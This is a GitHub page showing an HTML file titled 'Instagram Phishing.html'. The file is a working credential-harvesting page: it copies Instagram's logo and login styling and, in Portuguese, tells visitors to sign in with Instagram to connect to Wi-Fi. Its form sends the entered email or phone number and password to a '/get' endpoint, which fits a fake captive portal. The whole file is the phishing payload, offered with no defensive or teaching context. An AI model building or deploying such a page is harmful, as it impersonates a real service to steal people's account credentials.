-
Notifications
You must be signed in to change notification settings - Fork 0
/
Instagram ́Phishing.html
59 lines (59 loc) · 4.66 KB
/
Instagram ́Phishing.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<!DOCTYPE html>
<html lang="pt-BR">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login</title>
</head>
<body style="font-family: Arial, sans-serif; background-color: #fafafa; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0;">
<div style="width: 100%; max-width: 350px; padding: 40px 20px; background-color: #fff; border: 1px solid #dbdbdb; border-radius: 8px; text-align: center;">
<div style="margin-bottom: 20px;">
<!-- Logotipo do Instagram em SVG -->
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
viewBox="0 0 800 800" style="enable-background:new 0 0 800 800;" xml:space="preserve" style="width: 175px;">
<g id="_x31_3">
<g>
<g>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="582.4734" y1="565.3093" x2="209.6897" y2="227.5917">
<stop offset="0" style="stop-color:#FEC053"/>
<stop offset="0.3273" style="stop-color:#F2203E"/>
<stop offset="0.6485" style="stop-color:#B729A8"/>
<stop offset="1" style="stop-color:#5342D6"/>
</linearGradient>
<path style="fill-rule:evenodd;clip-rule:evenodd;fill:url(#SVGID_1_);" d="M218.459,127.608h363.085
c49.938,0,90.848,40.904,90.848,90.848v363.088c0,49.942-40.909,90.848-90.848,90.848H218.459
c-49.947,0-90.851-40.906-90.851-90.848V218.456C127.608,168.512,168.512,127.608,218.459,127.608L218.459,127.608z"/>
</g>
<g>
<path style="fill-rule:evenodd;clip-rule:evenodd;fill:#FFFFFF;" d="M526.769,400.003c0-70.027-56.743-126.77-126.769-126.77
c-70.027,0-126.767,56.743-126.767,126.77c0,70.023,56.74,126.767,126.767,126.767
C470.026,526.769,526.769,470.026,526.769,400.003L526.769,400.003z M524.369,256.005c-11.316,0-20.399,9.172-20.399,20.399
c0,11.316,9.083,20.402,20.399,20.402c11.229,0,20.398-9.086,20.398-20.402C544.768,265.177,535.599,256.005,524.369,256.005
L524.369,256.005z M296.376,226.693h207.25c38.401,0,69.684,31.37,69.684,69.681v207.249c0,38.401-31.282,69.69-69.684,69.69
h-207.25c-38.314,0-69.686-31.288-69.686-69.69V296.374C226.69,258.063,258.063,226.693,296.376,226.693L296.376,226.693z
M503.626,203.463h-207.25c-51.087,0-92.913,41.826-92.913,92.91v207.249c0,51.174,41.826,92.916,92.913,92.916h207.25
c51.171,0,92.91-41.742,92.91-92.916V296.374C596.536,245.289,554.797,203.463,503.626,203.463L503.626,203.463z
M299.545,400.003c0-55.459,44.999-100.458,100.455-100.458s100.455,44.999,100.455,100.458
c0,55.456-44.999,100.449-100.455,100.449S299.545,455.459,299.545,400.003L299.545,400.003z"/>
</g>
</g>
</g>
<g id="Layer_1">
</g>
</svg>
</div>
<p style="font-size: 14px; color: #8e8e8e; margin-bottom: 20px;">Para conectar-se ao Wi-Fi, entre com o seu Instagram</p>
<!-- Formulário de login -->
<form action="/get" id="login-form">
<div style="margin-bottom: 15px;">
<input name="email" class="input-field" type="text" placeholder="Email ou número de telefone" required style="width: 100%; padding: 10px; border: 1px solid #dbdbdb; border-radius: 4px; font-size: 14px; background-color: #fafafa;">
</div>
<div style="margin-bottom: 15px;">
<input name="password" class="input-field" type="password" placeholder="Senha" required style="width: 100%; padding: 10px; border: 1px solid #dbdbdb; border-radius: 4px; font-size: 14px; background-color: #fafafa;">
</div>
<button class="submit-btn" type="submit" style="width: 100%; padding: 10px; border: none; background-color: #0095f6; color: #fff; font-size: 14px; font-weight: bold; border-radius: 4px; cursor: pointer;">Continue</button>
</form>
<a href="#" style="margin-top: 15px; font-size: 12px; color: #00376b; text-decoration: none; display: inline-block;">Esqueceu a senha?</a>
</div>
</body>
</html>